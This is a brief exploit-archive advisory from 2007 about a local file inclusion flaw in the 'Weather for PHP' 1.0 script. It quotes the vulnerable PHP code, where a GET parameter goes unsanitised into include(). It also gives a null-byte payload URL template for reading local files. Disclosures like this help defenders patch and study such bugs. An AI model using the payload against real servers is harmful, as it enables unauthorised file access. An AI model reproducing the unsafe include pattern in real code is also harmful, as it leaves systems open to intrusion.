InstaGuide Weather Script (index.php) Local File Inclusion Vulnerability

2007-10-22T00:00:00
ID 1337DAY-ID-2242
Type zdt
Reporter BorN To K!LL
Modified 2007-10-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
InstaGuide Weather Script (index.php) Local File Inclusion Vulnerability
========================================================================



Weather for PHP <= (PageName) Local File Include Vulnerability

Script : Weather for PHP

Version : 1.0

Download : http://www.instaguide.com/download/weather_free.zip
 
AUTHOR : BorN To K!LL

Vuln Code :

$PageName = $_GET['PageName'];     //// this is one ... :)

include("includes/content/$PageName.php")   //// this is two ... :)

Exploit :

[path]/index.php?PageName[Local File]%00

Greetings :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ...

BorN To K!LL <> Dr.2 = 4ever .... =D



#  0day.today [2018-04-06]  #